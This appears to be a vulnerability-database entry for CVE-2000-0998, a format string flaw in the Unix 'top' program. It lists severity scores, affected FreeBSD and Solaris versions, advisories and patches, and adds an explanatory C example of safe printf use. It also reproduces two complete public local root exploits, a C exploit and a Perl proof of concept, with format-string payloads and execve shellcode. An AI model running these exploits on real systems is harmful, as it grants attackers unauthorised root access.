CVE-2000-0998
CVSS 7.2
Published: 2000-12-11 00:00:00
Last modified: 2008-09-05 16:22:23

[Original] Format string vulnerability in top program allows local attackers to gain root privileges via the "kill" or "renice" function.


[CNNVD] Multi-vendor top format string vulnerability (CNNVD-200012-011)

The top program contains a format string vulnerability. A local attacker can gain root privileges via the "kill" or "renice" functions.

- CVSS (base score)

CVSS score: 7.2 [HIGH]
Confidentiality impact: COMPLETE [total information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [the system can be made completely unavailable]
Access complexity: LOW [no special access conditions are needed to exploit]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [no authentication is needed to exploit]

- CPE (affected platforms and products)

cpe:/o:freebsd:freebsd:4.1.1 (FreeBSD 4.1.1)
cpe:/o:freebsd:freebsd:3.5.1:release
cpe:/o:freebsd:freebsd:3.5.1 (FreeBSD 3.5.1)
cpe:/o:freebsd:freebsd:3.5 (FreeBSD 3.5)
cpe:/o:freebsd:freebsd:3.5:stable
cpe:/o:freebsd:freebsd:4.0:alpha
cpe:/o:freebsd:freebsd:3.5.1:stable
cpe:/o:freebsd:freebsd:4.0 (FreeBSD 4.0)
cpe:/o:freebsd:freebsd:4.1 (FreeBSD 4.1)

- OVAL (technical details for detection)

No matching OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0998
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0998
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200012-011
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/1895
(VENDOR_ADVISORY) BID 1895
ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-00:62.top.v1.1.asc
(VENDOR_ADVISORY) FREEBSD FreeBSD-SA-00:62
ftp://ftp.openbsd.org/pub/OpenBSD/patches/2.7/common/028_format_strings.patch
(UNKNOWN) MISC ftp://ftp.openbsd.org/pub/OpenBSD/patches/2.7/common/028_format_strings.patch

- Vulnerability information

Multi-vendor top format string vulnerability
High severity  Format string
2000-12-11 00:00:00 2007-05-11 00:00:00
Local
The top program contains a format string vulnerability. A local attacker can gain root privileges via the "kill" or "renice" functions.

- Advisories and patches

FreeBSD has released patches for this vulnerability.
The vendor has released version 3.5.1 of top to address this vulnerability.

William LeFebvre top 1.0
William LeFebvre top 1.2
William LeFebvre top 1.3
William LeFebvre top 1.4
William LeFebvre top 1.5
William LeFebvre top 1.6
William LeFebvre top 1.7
William LeFebvre top 1.8
William LeFebvre top 2.0
William LeFebvre top 2.0 pre
William LeFebvre top 2.0.11
William LeFebvre top 2.1
William LeFebvre top 3.5
FreeBSD FreeBSD 4.0

- Vulnerability information (20377)

FreeBSD 3.5/4.x top Format String Vulnerability (EDBID:20377)
freebsd local
2000-11-01 Verified
0 truefinder
N/A
source: http://www.securityfocus.com/bid/1895/info

top is a program used to display system usage statistics in real time, written by GroupSys Consulting but shipped by default as a core component of many operating systems. On BSD systems, top is installed setgid kmem so that it can read process information from kernel memory when executed by a user who does not have that privilege.

top contains a format-string vulnerability that may lead to a compromise of the effective group ID kmem on BSD systems (or similar privileges on other systems). The problem occurs when error messages are printed to the user's terminal: a string partially composed of user input (the error message) is passed to a printf() function as the format-string argument, allowing malicious format specifiers in the user input to corrupt stack variables and execute arbitrary code.

If a malicious user gains egid kmem, vital information can be read from kernel memory that may lead to a further elevation of privileges (most certainly root eventually).

The versions of top that ship with FreeBSD prior to 4.2 are known to be vulnerable. It is likely that other systems are vulnerable, though none are confirmed yet.
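As an added illustration (not code from this record, from the exploits below, or from top itself), the following C program shows the bug class the description refers to: the hardened form, in which the user-supplied text is passed as an argument to a constant format string, next to a small audit helper that counts printf-style conversion directives in untrusted text, which is the condition that made the "kill"/"renice" input dangerous. The function names, the "unknown process" message wording and the sample strings are constructed for this example.

```c
#include <stdio.h>
#include <string.h>

/*
 * Added illustration of the bug class described above; this is NOT top's
 * own code.  In top, the text of an error message that embedded the user's
 * "kill"/"renice" argument was handed to printf() as the *format*, i.e.
 *
 *     snprintf(msg, sizeof msg, "unknown process: %s", user_arg);
 *     printf(msg);                 <-- vulnerable: msg itself is the format
 *
 * so a directive such as "%200$p" typed at the top prompt is interpreted.
 * The vulnerable call is shown only in this comment, because executing it
 * with directive-bearing input is undefined behaviour.
 */

/* Hardened form: the user-controlled text is always an *argument* to a
 * constant format string, so any '%' inside it is just a character.
 * Returns snprintf's count of characters that would be written (no NUL). */
int report_error_safe(char *out, size_t outlen, const char *user_arg)
{
    return snprintf(out, outlen, "unknown process: %s", user_arg);
}

/* Audit/detection helper: count printf-style conversion directives in
 * untrusted text.  "%%" is an escaped percent sign and is not counted.
 * A non-zero result on text that a program is about to use as a format
 * string is exactly the condition behind this CVE. */
int count_format_directives(const char *s)
{
    int n = 0;
    for (; *s != '\0'; s++) {
        if (*s != '%')
            continue;
        if (s[1] == '%') {      /* "%%": literal percent, skip both chars */
            s++;
            continue;
        }
        n++;
    }
    return n;
}

/* Runs the hardened path on a constructed input carrying the kind of
 * directive quoted in the public exploits and returns 1 if the text came
 * through verbatim (i.e. was not interpreted), 0 otherwise. */
int safe_path_preserves_input(void)
{
    char out[128];
    const char *arg = "%230$hn";    /* constructed sample, not from a real session */
    report_error_safe(out, sizeof out, arg);
    return strcmp(out, "unknown process: %230$hn") == 0;
}

int main(void)
{
    /* constructed sample inputs */
    const char *samples[] = { "1234", "k %200$p", "100%% done", "k %190u%230$hn" };
    size_t i;
    for (i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-20s directives=%d\n", samples[i], count_format_directives(samples[i]));
    printf("hardened path preserved input: %s\n",
           safe_path_preserves_input() ? "yes" : "no");
    return 0;
}
```

The detection helper is useful for auditing input handlers or flagging suspicious command arguments in logs, but the actual fix is the one in report_error_safe: never let data that a user controls reach the format-string parameter of the printf family.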

/*
 * freebsd x86 top exploit
 * affected under top-3.5beta9 ( including this version )
 *
 * 1. get the address of .dtors from /usr/bin/top using objdump ,
 *
 *  'objdump -s -j .dtors /usr/bin/top'
 *
 * 2. divide it into four parts, and set it up into an environment variable like "XSEO="
 *
 * 3. run top, then find "your parted addresses from "kill" or "renice" command like this
 *
 *  'k %200$p' or 'r 2000 %200$p'
 *
 * 4. do exploit !
 *
 *  'k %190u%230$hn' <== 0xbf (4)
 *  'k %190u%229$hn' <== 0xbf (3)
 *  'k %214u%228$hn' <== 0xd7 (2)
 *  'k %118u%227$hn' <== 0x77 (1)
 *
 * truefinder , seo@igrus.inha.ac.kr
 * thx  mat, labman, zen-parse
 *
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define NOP 0x90
#define BUFSIZE 2048

char fmt[]=
"XSEO="
/* you would meet above things from 'k %200$p', it's confirming strings*/
"SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS"
/* .dtors's address in BSD*/
"\x08\xff\x04\x08"
"\x09\xff\x04\x08"
"\x0a\xff\x04\x08"
"\x0b\xff\x04\x08"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";

/* might shellcode be located 0xbfbfd6? ~ 0xbfbfde? */

char sc[]=
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
"\x62\x69\x6e\x89\xe3\x50\x53\x50\x54\x53"
"\xb0\x3b\x50\xcd\x80"; /* bigwaks 23 bytes shellcode */

int
main(void)
{
        char scbuf[BUFSIZE];
        char *scp;

        scp = scbuf;
        memset( scbuf, NOP, BUFSIZE );

        scp += ( BUFSIZE - strlen(sc) - 1);
        memcpy( scp, sc ,strlen(sc));

        scbuf[ BUFSIZE - 1] = '\0';

        memcpy( scbuf, "EGG=", 4);

        putenv(fmt);
        putenv(scbuf);

        system("/bin/bash");
        return 0;
}

- Vulnerability information (20378)

Debian GNU/Linux 3.1 top Format String Vulnerability (EDBID:20378)
linux local
2004-12-12 Verified
0 Kevin Finisterre
N/A
source: http://www.securityfocus.com/bid/1895/info
 

#!/usr/bin/perl 
# PoC for DMA[2005-0103a].txt
# Copyright Kevin Finisterre
# 12/12/2004
# William LeFebvre - unixtop 'kill' format string
# Tested on Debian GNU/Linux 3.1 with top compiled from 
# top-3.5.tar.gz
#
# This currently DOES NOT work outside of strace. 
# /tmp/sh is run for the time being. 

# offsets definately vary within gdb, strace and just plain top
# this is probably due to the use of the env for our write address
$fmt = "%.49149d.%180\$hn.%.15825d.%181\$hn";  # offset within strace

# The length of shellcode affects the offset for our %x's
# Obviously this is because the env is used to store the write address
$sc = "\x90" x (511-45) . # subtract shellcode len

# 45 bytes by anthema. 0xff less
"\x89\xe6"     . #                     /* movl %esp, %esi          */
"\x83\xc6\x30" . #                     /* addl $0x30, %esi         */
#"\xb8\x2e\x62\x69\x6e" . # /bin      /* movl $0x6e69622e, %eax   */
"\xb8\x2e\x74\x6D\x70" . # /tmp        /* movl $0x6e69622e, %eax   */
"\x40"         . #                     /* incl %eax                */
"\x89\x06"     . #                     /* movl %eax, (%esi)        */
"\xb8\x2e\x73\x68\x21" . # /sh           /* movl $0x2168732e, %eax   */
"\x40"         . #                    /* incl %eax                */
"\x89\x46\x04" . #                    /* movl %eax, 0x04(%esi)    */
"\x29\xc0"     . #                    /* subl %eax, %eax          */
"\x88\x46\x07" . #                    /* movb %al, 0x07(%esi)     */
"\x89\x76\x08" . #                    /* movl %esi, 0x08(%esi)    */
"\x89\x46\x0c" . #                    /* movl %eax, 0x0c(%esi)    */
"\xb0\x0b"     . #                     /* movb $0x0b, %al          */
"\x87\xf3"     . #                     /* xchgl %esi, %ebx         */
"\x8d\x4b\x08" . #                     /* leal 0x08(%ebx), %ecx    */
"\x8d\x53\x0c" . #                      /* leal 0x0c(%ebx), %edx    */
"\xcd\x80"; #                          /* int $0x80                */

$topcmd = "k $fmt";  # Use the top kill command

# Lazy hack to pass input to top. 
# Write to file "ex" and feed to top via < 
open(FILEH, ">ex") or die "sorry can't write cmd file.\n";
print FILEH $topcmd;

# Clear out the environment.
# Thanks John!
foreach $key (keys %ENV) {

    delete $ENV{$key};

}
# Is the env *really* clear when we run system()? 

# sprintf() is called after the new_message() call so lets overwrite it
# 0804f340 R_386_JUMP_SLOT   sprintf
$addr1 = "\x42\xf3\x04\x08";
$addr2 = "\x40\xf3\x04\x08";

# Digital Munitions R0x your b0x. 
# set up some padding, insert write addresses and follow up with shellcode
$ENV{"DMR0x"} = "AZZZZZZZ$addr1$addr2$sc";
$ENV{"TERM"} = "linux";
$ENV{"PATH"} = "/usr/local/bin:/usr/bin:/bin";

# Run top and feed it the file "ex" which contains the malicious kill command
# This saves us from typing like we had to do with Seo's exploit 
$topexec = "cat ex | strace -i ./top";
system($topexec);

- Vulnerability information

12801
William LeFebvre top Multiple Function Format String
Local / Remote, Context Dependent Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

- Timeline

2000-10-06 Unknown
2000-10-06 Unknown

- Solutions

Products

Unknown or Incomplete

- References

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

Multiple Vendor top Format String Vulnerability
Input Validation Error 1895
No Yes
2000-11-01 12:00:00 2009-07-11 03:56:00
First published in FreeBSD advisory FreeBSD-SA-00:62 on Nov 1, 2000.

- Affected program versions

William LeFebvre top 3.5
William LeFebvre top 2.1
William LeFebvre top 2.0.11
William LeFebvre top 2.0 pre
William LeFebvre top 2.0
William LeFebvre top 1.8
William LeFebvre top 1.7
William LeFebvre top 1.6
William LeFebvre top 1.5
William LeFebvre top 1.4
William LeFebvre top 1.3
William LeFebvre top 1.2
William LeFebvre top 1.0
Sun Solaris 8_x86
Sun Solaris 8_sparc
Sun Solaris 7.0_x86
Sun Solaris 7.0
Sun Solaris 2.6_x86
Sun Solaris 2.6
FreeBSD FreeBSD 4.1.1
FreeBSD FreeBSD 4.1
FreeBSD FreeBSD 4.0 alpha
FreeBSD FreeBSD 4.0
FreeBSD FreeBSD 3.5 x
William LeFebvre top 3.5.1
FreeBSD FreeBSD 4.2

- Unaffected program versions

William LeFebvre top 3.5.1
FreeBSD FreeBSD 4.2

- Vulnerability discussion


- Exploits

The 'top-format-ex.c' exploit was contributed by SeungHyun Seo <s1980914@inhavision.inha.ac.kr> on 25 July, 2001.

The 'top_ex.pl' exploit was contributed by Kevin Finisterre on 12 Dec, 2004.

- Solutions

FreeBSD has released patches for this vulnerability.

The vendor has released version 3.5.1 of top to address this vulnerability.


- References

 

 
